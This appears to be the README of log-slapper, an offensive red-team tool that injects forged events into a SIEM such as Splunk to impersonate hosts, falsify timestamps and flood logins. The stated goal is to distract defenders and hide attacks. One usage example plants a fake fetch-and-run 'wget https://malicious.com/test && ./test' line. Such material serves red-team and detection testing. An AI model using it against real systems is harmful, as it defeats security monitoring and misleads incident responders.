Every company undoubtedly trusts its SIEM, right? Think twice, we can inject fake logs, distract BT's and hide our attacks.
log-slapper is the offensive security tool for red-teamers and specifically designed for post-exploit part of the campaign.
log-slapper can:
- mimic attacks on behalf of any other computer on the network
- run in interactive mode: Target Shell Playzone
- send logs from future and past: HEC based Time Traveller's attack
- perform built-in attacks like login success/fail spam, new process creations
![image](https://private-user-images.githubusercontent.com/57866851/319383605-a564c9c5-9bcf-4ff8-b4ee-941c359e45bd.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTk1NzA3NTUsIm5iZiI6MTcxOTU3MDQ1NSwicGF0aCI6Ii81Nzg2Njg1MS8zMTkzODM2MDUtYTU2NGM5YzUtOWJjZi00ZmY4LWI0ZWUtOTQxYzM1OWU0NWJkLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA2MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNjI4VDEwMjczNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTAyZTk5ZDhiMDhhYTkyMjdhODM2NTYwMmQzZTQ0OGYzNDQ5MjNhNDcyYWM0MGJlODgyNzU4NTdlNzA2YjBkMzEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.O93caV73XzpSa9wEtomOJ5g85_LAjdXcMybtSKmaLHg)
go into interactive mode:
./log-slapper interactive
send log as "payment-server-01" got hacked and malicious code is running:
./log-slapper nix_command --hostname "payment-server-01" --ip "23.32.45.123" -t "e270e632-861f-45cc-8f00-f91eb895f5e6" --exectime "10/10/2021 08:45" --command "wget https://malicious.com/test && ./test"
Now check your Splunk 🙂
for more details on research, usage of log-slapper and more: